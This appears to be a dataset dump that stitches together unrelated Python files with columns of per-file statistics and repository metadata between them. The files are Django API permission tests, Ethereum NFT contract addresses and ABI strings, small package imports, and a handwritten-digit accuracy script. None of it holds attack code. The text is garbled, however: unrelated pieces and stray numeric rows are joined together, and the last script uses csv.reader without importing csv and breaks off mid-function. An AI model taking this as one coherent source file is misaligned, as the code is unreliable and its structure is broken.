    def test_update(self, client_ctx_manager, url, http_status, most_models):
        with client_ctx_manager() as client:
            # Fill URL placeholders from the fixture objects in most_models.
            url = url.format(**most_models)
            response = client.put(url)
            assert response.status_code == http_status
@pytest.mark.django_db
class TestPartialUpdate:
    """Exercise PATCH (partial update) on every detail endpoint per client type.

    Expectations encoded in the table below:
      - anonymous_client: always 403 (authentication required).
      - user_client: 200 on resources the user owns, 404 on resources owned
        by someone else (their existence is hidden), 405 where PATCH is not
        allowed (scm-services, scm-releases).
      - scoped_client: same results as an owning user for the fixture data.
    """

    @pytest.mark.parametrize(
        ("client_ctx_manager", "url", "http_status"),
        [
            (anonymous_client, "/applications/{application.public_identifier}/", 403),
            (anonymous_client, "/applications/unknown/", 403),
            (anonymous_client, "/applications/{application.public_identifier}/metadata/{metadata.key}/", 403),
            (anonymous_client, "/teams/{team.public_identifier}/", 403),
            (anonymous_client, "/projects/{project.public_identifier}/", 403),
            (anonymous_client, "/credentials/{credential.public_identifier}/", 403),
            (anonymous_client, "/credentials/{credential.public_identifier}/secrets/{secret.key}/", 403),
            (anonymous_client, "/scm-services/{service.public_identifier}/", 403),
            (anonymous_client, "/scm-repositories/{repository.public_identifier}/", 403),
            (anonymous_client, "/scm-pipeline-runs/{pipeline_run.public_identifier}/", 403),
            (anonymous_client, "/scm-step-runs/{step_run.public_identifier}/", 403),
            (anonymous_client, "/scm-releases/{release.public_identifier}/", 403),
            (user_client, "/applications/{application.public_identifier}/", 200),
            (user_client, "/applications/unknown/", 404),
            (user_client, "/applications/{application.public_identifier}/metadata/{metadata.key}/", 200),
            (user_client, "/teams/{team.public_identifier}/", 200),
            (user_client, "/projects/{project.public_identifier}/", 200),
            (user_client, "/credentials/{credential.public_identifier}/", 200),
            (user_client, "/credentials/{credential.public_identifier}/secrets/{secret.key}/", 200),
            (user_client, "/scm-services/{service.public_identifier}/", 405),
            (user_client, "/scm-repositories/{repository.public_identifier}/", 200),
            (user_client, "/scm-pipeline-runs/{pipeline_run.public_identifier}/", 200),
            (user_client, "/scm-step-runs/{step_run.public_identifier}/", 200),
            (user_client, "/scm-releases/{release.public_identifier}/", 405),
            # check user_client, but this time with everything that does not belong to that user
            (user_client, "/applications/{not_my_application.public_identifier}/", 404),
            (user_client, "/applications/{not_my_application.public_identifier}/metadata/{not_my_metadata.key}/", 404),
            (user_client, "/teams/{not_my_team.public_identifier}/", 404),
            (user_client, "/projects/{not_my_project.public_identifier}/", 404),
            (user_client, "/credentials/{not_my_credential.public_identifier}/", 404),
            (user_client, "/credentials/{not_my_credential.public_identifier}/secrets/{not_my_secret.key}/", 404),
            # no need to check services again, since they are all public
            (user_client, "/scm-repositories/{not_my_repository.public_identifier}/", 404),
            (user_client, "/scm-pipeline-runs/{not_my_pipeline_run.public_identifier}/", 404),
            (user_client, "/scm-step-runs/{not_my_step_run.public_identifier}/", 404),
            (user_client, "/scm-releases/{not_my_release.public_identifier}/", 405),
            (scoped_client, "/applications/{application.public_identifier}/", 200),
            (scoped_client, "/applications/{application.public_identifier}/metadata/{metadata.key}/", 200),
            (scoped_client, "/teams/{team.public_identifier}/", 200),
            (scoped_client, "/projects/{project.public_identifier}/", 200),
            (scoped_client, "/credentials/{credential.public_identifier}/", 200),
            (scoped_client, "/credentials/{credential.public_identifier}/secrets/{secret.key}/", 200),
            (scoped_client, "/scm-services/{service.public_identifier}/", 405),
            (scoped_client, "/scm-repositories/{repository.public_identifier}/", 200),
            (scoped_client, "/scm-pipeline-runs/{pipeline_run.public_identifier}/", 200),
            (scoped_client, "/scm-step-runs/{step_run.public_identifier}/", 200),
            (scoped_client, "/scm-releases/{release.public_identifier}/", 405),
        ],
    )
    def test_partial_update(self, client_ctx_manager, url, http_status, most_models):
        # `most_models` supplies the fixture objects referenced by the URL
        # templates (application, team, not_my_* etc.).
        with client_ctx_manager() as client:
            url = url.format(**most_models)
            # PATCH with no body: a partial update with "no changes" succeeds
            # (200) when the client is allowed, unlike PUT which needs data.
            response = client.patch(url)
            assert response.status_code == http_status
@pytest.mark.django_db
class TestCreate:
    """Exercise POST (create) on each collection endpoint per client type.

    Expectations encoded in the table below:
      - anonymous_client: always 403 (authentication required).
      - user_client / scoped_client: 400 for writable collections because the
        posted body is empty (validation failure), 405 for read-only ones
        (scm-services, scm-releases), and 403 when posting into a nested
        collection that belongs to someone else.
    """

    @pytest.mark.parametrize(
        ("client_ctx_manager", "url", "http_status"),
        [
            (anonymous_client, "/applications/", 403),
            (anonymous_client, "/applications/unknown/", 403),
            (anonymous_client, "/applications/{application.public_identifier}/metadata/", 403),
            (anonymous_client, "/teams/", 403),
            (anonymous_client, "/projects/", 403),
            (anonymous_client, "/credentials/", 403),
            (anonymous_client, "/credentials/{credential.public_identifier}/secrets/", 403),
            (anonymous_client, "/scm-services/", 403),
            (anonymous_client, "/scm-repositories/", 403),
            (anonymous_client, "/scm-pipeline-runs/", 403),
            (anonymous_client, "/scm-step-runs/", 403),
            (anonymous_client, "/scm-releases/", 403),
            # since the post has incomplete data, we expect a 400 when we are allowed, not a 200 like with patch
            (user_client, "/applications/", 400),
            (user_client, "/applications/{application.public_identifier}/metadata/", 400),
            (user_client, "/teams/", 400),
            (user_client, "/projects/", 400),
            (user_client, "/credentials/", 400),
            (user_client, "/credentials/{credential.public_identifier}/secrets/", 400),
            (user_client, "/scm-services/", 405),
            (user_client, "/scm-repositories/", 400),
            (user_client, "/scm-pipeline-runs/", 400),
            (user_client, "/scm-step-runs/", 400),
            (user_client, "/scm-releases/", 405),
            # check user_client, but this time with everything that does not belong to that user
            (user_client, "/applications/{not_my_application.public_identifier}/metadata/", 403),
            (user_client, "/credentials/{not_my_credential.public_identifier}/secrets/", 403),
            (scoped_client, "/applications/", 400),
            (scoped_client, "/applications/{application.public_identifier}/metadata/", 400),
            (scoped_client, "/teams/", 400),
            (scoped_client, "/projects/", 400),
            (scoped_client, "/credentials/", 400),
            (scoped_client, "/credentials/{credential.public_identifier}/secrets/", 400),
            (scoped_client, "/scm-services/", 405),
            (scoped_client, "/scm-repositories/", 400),
            (scoped_client, "/scm-pipeline-runs/", 400),
            (scoped_client, "/scm-step-runs/", 400),
            (scoped_client, "/scm-releases/", 405),
        ],
    )
    def test_create(self, client_ctx_manager, url, http_status, most_models):
        # `most_models` supplies the fixture objects referenced by the URL
        # templates (application, credential, not_my_* etc.).
        with client_ctx_manager() as client:
            url = url.format(**most_models)
            # Empty JSON body: allowed clients get a validation 400, not 2xx.
            response = client.post(url, {}, content_type="application/json")
            assert response.status_code == http_status
| 67.977143
| 119
| 0.642317
| 2,493
| 23,792
| 5.86081
| 0.050943
| 0.203682
| 0.067757
| 0.061324
| 0.936418
| 0.894121
| 0.849429
| 0.841421
| 0.803983
| 0.719595
| 0
| 0.041291
| 0.202967
| 23,792
| 349
| 120
| 68.17192
| 0.72921
| 0.040896
| 0
| 0.56135
| 0
| 0
| 0.459589
| 0.417182
| 0
| 0
| 0
| 0
| 0.021472
| 1
| 0.018405
| false
| 0
| 0.006135
| 0
| 0.042945
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
c3d6489da43a2ad29cbe7287c4dfa4484a030e38
| 13,530
|
py
|
Python
|
src/lucha_utils.py
|
sznicolas/luchadata
|
effc3579ef00103b6601f4a6b67a0ac1e0fbef91
|
[
"MIT"
] | 3
|
2021-08-20T22:12:55.000Z
|
2022-01-19T17:09:46.000Z
|
src/lucha_utils.py
|
sznicolas/luchadata
|
effc3579ef00103b6601f4a6b67a0ac1e0fbef91
|
[
"MIT"
] | null | null | null |
src/lucha_utils.py
|
sznicolas/luchadata
|
effc3579ef00103b6601f4a6b67a0ac1e0fbef91
|
[
"MIT"
] | 1
|
2022-01-19T17:09:48.000Z
|
2022-01-19T17:09:48.000Z
|
#!/usr/bin/env python3
"""Shared constants for luchadata: on-chain block range and contract data.

NOTE(review): this docstring was empty; the description below is inferred
from the constant names and the ABI that follows — confirm against the
deployed contracts.
"""
from web3 import Web3

# first to last block containing a GenerateLuchador event
firstblock = 12450223
lastblock = 13046665

# Contracts data
# Address of the Luchador NFT contract (its ABI, below, declares the
# GenerateLuchador event) — presumably Ethereum mainnet; TODO confirm.
lucha_contract_addr = "0x8b4616926705Fb61E9C4eeAc07cd946a5D4b0760"
lucha_abi = '[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"approved","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"operator","type":"address"},{"indexed":false,"internalType":"bool","name":"approved","type":"bool"}],"name":"ApprovalForAll","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"uint256","name":"id","type":"uint256"},{"indexed":false,"internalType":"uint256","name":"dna","type":"uint256"}],"name":"GenerateLuchador","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"account","type":"address"}],"name":"Paused","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":true,"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"account","type":"address"}],"name":"Unpaused","type":"event"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"approve","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"}],"name":"balanceOf","outputs":[{"internalT
ype":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"baseURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_quantity","type":"uint256"},{"internalType":"uint256","name":"_deadline","type":"uint256"}],"name":"generateLuchador","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"getApproved","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId","type":"uint256"}],"name":"imageData","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"operator","type":"address"}],"name":"isApprovedForAll","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId","type":"uint256"}],"name":"metadata","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"ownerOf","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"pauseSale","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"paused","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view",
"type":"function"},{"inputs":[{"internalType":"bytes32","name":"requestId","type":"bytes32"},{"internalType":"uint256","name":"randomness","type":"uint256"}],"name":"rawFulfillRandomness","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"},{"internalType":"bytes","name":"_data","type":"bytes"}],"name":"safeTransferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"operator","type":"address"},{"internalType":"bool","name":"approved","type":"bool"}],"name":"setApprovalForAll","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"string","name":"_baseURI","type":"string"}],"name":"setBaseURI","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_LinkFee","type":"uint256"}],"name":"setLinkFee","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"bytes4","name":"interfaceId","type":"bytes4"}],"name":"supportsInterface","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stat
eMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"uint256","name":"index","type":"uint256"}],"name":"tokenOfOwnerByIndex","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"_tokenId","type":"uint256"}],"name":"tokenURI","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"tokenId","type":"uint256"}],"name":"transferFrom","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapRouter","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"unpauseSale","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]'
# Address of the companion naming contract (its ABI, below, declares the
# SetName event and the setNName/getName functions).
luchanames_contract_addr = "0x741f506e38ceA4e001f770eB14F6eC9B468D9899"
luchanames_abi = '[{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"account","type":"address"}],"name":"Paused","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"_originContract","type":"address"},{"indexed":true,"internalType":"address","name":"_sender","type":"address"},{"indexed":false,"internalType":"uint256","name":"id","type":"uint256"},{"indexed":false,"internalType":"string","name":"name","type":"string"}],"name":"SetName","type":"event"},{"anonymous":false,"inputs":[{"indexed":false,"internalType":"address","name":"account","type":"address"}],"name":"Unpaused","type":"event"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"address","name":"","type":"address"}],"name":"addressBlacklist","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_originContract","type":"address"},{"internalType":"address","name":"_address","type":"address"},{"internalType":"bool","name":"_bool","type":"bool"}],"name":"blacklistAddress","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_originContract","type":"address"},{"internalType":"uint256","name":"_id","type":"uint256"}],"name":"blacklistName","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_originContract","type":"address"},{"internalType":"uint256","name":"_id","type":"uint256"}],"name":"getName","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"string","name":"_name","type":"string"}],"name":"
isSafeName","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"string","name":"","type":"string"}],"name":"nameExists","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"nameFee","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"uint256","name":"","type":"uint256"}],"name":"names","outputs":[{"internalType":"string","name":"name","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"pause","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"paused","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_originContract","type":"address"},{"internalType":"uint256","name":"_id","type":"uint256"},{"internalType":"string","name":"_name","type":"string"}],"name":"set1Name","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"_originContract","type":"address"},{"internalType":"uint256","name":"_id","type":"uint256"},{"internalType":"string","name":"_name1","type":"string"},{"internalType":"string","name":"_name2","type":"string"}],"name":"set2Names","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"_originContract","type":"address"},{"internalType":"uint256","name":"_id","type":"uint256"},{"internalType":"string","name":"_name1","type"
:"string"},{"internalType":"string","name":"_name2","type":"string"},{"internalType":"string","name":"_name3","type":"string"}],"name":"set3Names","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"_originContract","type":"address"},{"internalType":"uint256","name":"_id","type":"uint256"},{"internalType":"string","name":"_name1","type":"string"},{"internalType":"string","name":"_name2","type":"string"},{"internalType":"string","name":"_name3","type":"string"},{"internalType":"string","name":"_name4","type":"string"}],"name":"set4Names","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"address","name":"_originContract","type":"address"},{"internalType":"uint256","name":"_id","type":"uint256"},{"internalType":"string","name":"_name1","type":"string"},{"internalType":"string","name":"_name2","type":"string"},{"internalType":"string","name":"_name3","type":"string"},{"internalType":"string","name":"_name4","type":"string"},{"internalType":"string","name":"_name5","type":"string"}],"name":"set5Names","outputs":[],"stateMutability":"payable","type":"function"},{"inputs":[{"internalType":"uint256","name":"_nameFee","type":"uint256"}],"name":"setNameFee","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"unpause","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"withdraw","outputs":[],"stateMutability":"nonpayable","type":"function"},{"stateMutability":"payable","type":"receive"}]'
| 712.105263
| 7,493
| 0.666519
| 1,289
| 13,530
| 6.957331
| 0.096974
| 0.071142
| 0.100357
| 0.107047
| 0.862623
| 0.84322
| 0.828167
| 0.762823
| 0.758363
| 0.708073
| 0
| 0.022618
| 0.003326
| 13,530
| 18
| 7,494
| 751.666667
| 0.642418
| 0.0068
| 0
| 0
| 1
| 0.285714
| 0.987786
| 0.987711
| 0
| 0
| 0.006256
| 0
| 0
| 1
| 0
| false
| 0
| 0.142857
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
c3e34fcfa228999b37adeec89ee7ef43350a50a3
| 61
|
py
|
Python
|
problem_18/__init__.py
|
oltionzefi/daily-coding-problem
|
4fe3ec53e1f3c7d299849671fdfead462d548cd3
|
[
"MIT"
] | null | null | null |
problem_18/__init__.py
|
oltionzefi/daily-coding-problem
|
4fe3ec53e1f3c7d299849671fdfead462d548cd3
|
[
"MIT"
] | null | null | null |
problem_18/__init__.py
|
oltionzefi/daily-coding-problem
|
4fe3ec53e1f3c7d299849671fdfead462d548cd3
|
[
"MIT"
] | null | null | null |
from .problem_18 import max_sub_arrays, max_sub_arrays_deque
| 30.5
| 60
| 0.885246
| 11
| 61
| 4.363636
| 0.727273
| 0.25
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.035714
| 0.081967
| 61
| 1
| 61
| 61
| 0.821429
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
61877ccfd874f866d733ef6ccc36256f467864f9
| 112
|
py
|
Python
|
src/accounts/forms/__init__.py
|
Talengi/phase
|
60ff6f37778971ae356c5b2b20e0d174a8288bfe
|
[
"MIT"
] | 8
|
2016-01-29T11:53:40.000Z
|
2020-03-02T22:42:02.000Z
|
src/accounts/forms/__init__.py
|
Talengi/phase
|
60ff6f37778971ae356c5b2b20e0d174a8288bfe
|
[
"MIT"
] | 289
|
2015-03-23T07:42:52.000Z
|
2022-03-11T23:26:10.000Z
|
src/accounts/forms/__init__.py
|
Talengi/phase
|
60ff6f37778971ae356c5b2b20e0d174a8288bfe
|
[
"MIT"
] | 7
|
2015-12-08T09:03:20.000Z
|
2020-05-11T15:36:51.000Z
|
# -*- coding: utf-8 -*-
from accounts.forms.fields import * # noqa
from accounts.forms.base import * # noqa
| 18.666667
| 43
| 0.660714
| 15
| 112
| 4.933333
| 0.666667
| 0.324324
| 0.459459
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.010989
| 0.1875
| 112
| 5
| 44
| 22.4
| 0.802198
| 0.276786
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4ef5b9e80c846bf8c9ffd7c4bf44ccc8cb8c2f52
| 8,861
|
py
|
Python
|
analysis/analysis.py
|
tonandr/spark_deep
|
f9fcb3d7fe9f23624b545b4d5e7506ba6d95f010
|
[
"Apache-2.0"
] | null | null | null |
analysis/analysis.py
|
tonandr/spark_deep
|
f9fcb3d7fe9f23624b545b4d5e7506ba6d95f010
|
[
"Apache-2.0"
] | 1
|
2020-10-14T04:36:12.000Z
|
2020-10-14T04:36:12.000Z
|
analysis/analysis.py
|
tonandr/spark_fnn
|
f9fcb3d7fe9f23624b545b4d5e7506ba6d95f010
|
[
"Apache-2.0"
] | null | null | null |
'''
Analysis of learning models' evaluation
@author: Inwoo Chung (gutomitai@gmail.com)
@since: Sep. 17, 2016
'''
'''
Analysis about SparkNeuralNetwork.
'''
import math
# Calculate judging accuracy for classification.
def calJudgingAccuracyC(yResults, jResult):
    """Return classification accuracy: the fraction of columns where the
    expected label in ``yResults`` equals the judged label in ``jResult``.

    Both arguments are Matrix-like objects exposing ``colLength()`` and
    ``getVal(row, col)`` with 1-based indices. Each comparison and the final
    percentage are printed, as in the original implementation.

    Raises:
        ZeroDivisionError: if the matrices have zero columns.
    """
    # Count matched numbers. Python 2 `print x, y` statements were converted
    # to the print() function so the module loads on Python 3; the repeated
    # getVal() calls are hoisted into locals.
    length = yResults.colLength()
    count = 0.0
    for i in range(length):
        expected = yResults.getVal(1, i + 1)
        judged = jResult.getVal(1, i + 1)
        print(i, expected, judged)
        if expected == judged:
            count += 1.0
    accuracy = count / float(length)
    print(str(accuracy * 100.0) + " %")
    return accuracy
# Calculate judging accuracy for regression.
def calJudgingAccuracyR(yResults, jResult):
    """Return the mean absolute difference between expected values in
    ``yResults`` and judged values in ``jResult`` (despite the name, this
    is an error measure: lower is better).

    Both arguments are Matrix-like objects exposing ``colLength()`` and
    ``getVal(row, col)`` with 1-based indices. Each comparison and the final
    value are printed, as in the original implementation.

    Raises:
        ZeroDivisionError: if the matrices have zero columns.
    """
    # Python 2 `print x, y` statements were converted to the print()
    # function so the module loads on Python 3.
    length = yResults.colLength()
    diffSum = 0.0
    for i in range(length):
        expected = yResults.getVal(1, i + 1)
        judged = jResult.getVal(1, i + 1)
        print(i, expected, judged)
        diffSum += math.fabs(expected - judged)
    accuracy = diffSum / float(length)
    print(str(accuracy))
    return accuracy
# Parse handwritten numbers data into matrixes.
def parseHandwrittenNumData(gateway, dataFilePath, loadFlag=False):
    """Load the 5000-sample handwritten-digit set into Py4J Matrix objects.

    Args:
        gateway: Py4J JavaGateway whose JVM exposes maum.dm.Matrix.
        dataFilePath: CSV file with 400 pixel columns plus a label column
            (labels 1..10, where 10 encodes the digit 0).
        loadFlag: when True, skip parsing and load previously serialized
            matrices from the HWN_*.ser files instead.

    Returns:
        Tuple (X, Y, yResults): 400x5000 features, 10x5000 one-hot labels,
        and 1x5000 numeric labels (0..9). The parsed matrices are also
        serialized to HWN_*.ser as a side effect.
    """
    if loadFlag:
        X = gateway.jvm.maum.dm.Matrix.loadMatrix("HWN_X.ser")
        Y = gateway.jvm.maum.dm.Matrix.loadMatrix("HWN_Y.ser")
        yResults = gateway.jvm.maum.dm.Matrix.loadMatrix("HWN_yResults.ser")
        return X, Y, yResults

    # csv.reader needs a text-mode file with newline='' on Python 3; the
    # original opened in 'rb', which only worked on Python 2. The local was
    # also renamed from `file`, which shadowed the builtin.
    with open(dataFilePath, newline='') as csv_file:
        csvReader = csv.reader(csv_file)

        # Create X, Y java matrix instances.
        X = gateway.jvm.maum.dm.Matrix(400, 5000, 0.0)
        Y = gateway.jvm.maum.dm.Matrix(10, 5000, 0.0)
        yResults = gateway.jvm.maum.dm.Matrix(1, 5000, 0.0)

        # Assign values at X, Y (Matrix indices are 1-based).
        cols = 1
        for line in csvReader:
            print(str(cols) + ", " + str(int(line[400])))
            for i in range(len(line) - 1):
                X.setVal(i + 1, cols, float(line[i]))
            # Label 10 stands for digit 0: one-hot row 1, numeric label 0.
            if int(line[400]) == 10:
                Y.setVal(1, cols, 1.0)
                yResults.setVal(1, cols, 0.0)
            else:
                Y.setVal(int(line[400]) + 1, cols, 1.0)
                yResults.setVal(1, cols, float(line[400]))
            cols = cols + 1

        # Save.
        X.saveMatrix("HWN_X.ser")
        Y.saveMatrix("HWN_Y.ser")
        yResults.saveMatrix("HWN_yResults.ser")
        return X, Y, yResults
# Parse handwritten numbers data into matrixes for regression.
def parseHandwrittenNumDataReg(gateway, dataFilePath, loadFlag=False):
    """Load the 5000-sample handwritten-digit set for regression training.

    Args:
        gateway: Py4J JavaGateway whose JVM exposes maum.dm.Matrix.
        dataFilePath: CSV file with 400 pixel columns plus a label column
            (labels 1..10, where 10 encodes the digit 0).
        loadFlag: when True, skip parsing and load previously serialized
            matrices from the HWN_*_reg.ser files instead.

    Returns:
        Tuple (X, Y, yResults): 400x5000 features and two identical 1x5000
        numeric-label matrices (0..9). The parsed matrices are also
        serialized to HWN_*_reg.ser as a side effect.
    """
    if loadFlag:
        X = gateway.jvm.maum.dm.Matrix.loadMatrix("HWN_X_reg.ser")
        Y = gateway.jvm.maum.dm.Matrix.loadMatrix("HWN_Y_reg.ser")
        yResults = gateway.jvm.maum.dm.Matrix.loadMatrix("HWN_yResults_reg.ser")
        return X, Y, yResults

    # csv.reader needs a text-mode file with newline='' on Python 3; the
    # original opened in 'rb', which only worked on Python 2. The local was
    # also renamed from `file`, which shadowed the builtin.
    with open(dataFilePath, newline='') as csv_file:
        csvReader = csv.reader(csv_file)

        # Create X, Y java matrix instances.
        X = gateway.jvm.maum.dm.Matrix(400, 5000, 0.0)
        Y = gateway.jvm.maum.dm.Matrix(1, 5000, 0.0)
        yResults = gateway.jvm.maum.dm.Matrix(1, 5000, 0.0)

        # Assign values at X, Y (Matrix indices are 1-based).
        cols = 1
        for line in csvReader:
            print(str(cols) + ", " + str(int(line[400])))
            for i in range(len(line) - 1):
                X.setVal(i + 1, cols, float(line[i]))
            # Label 10 stands for digit 0: regression target 0.0.
            if int(line[400]) == 10:
                Y.setVal(1, cols, 0.0)
                yResults.setVal(1, cols, 0.0)
            else:
                Y.setVal(1, cols, float(line[400]))
                yResults.setVal(1, cols, float(line[400]))
            cols = cols + 1

        # Save.
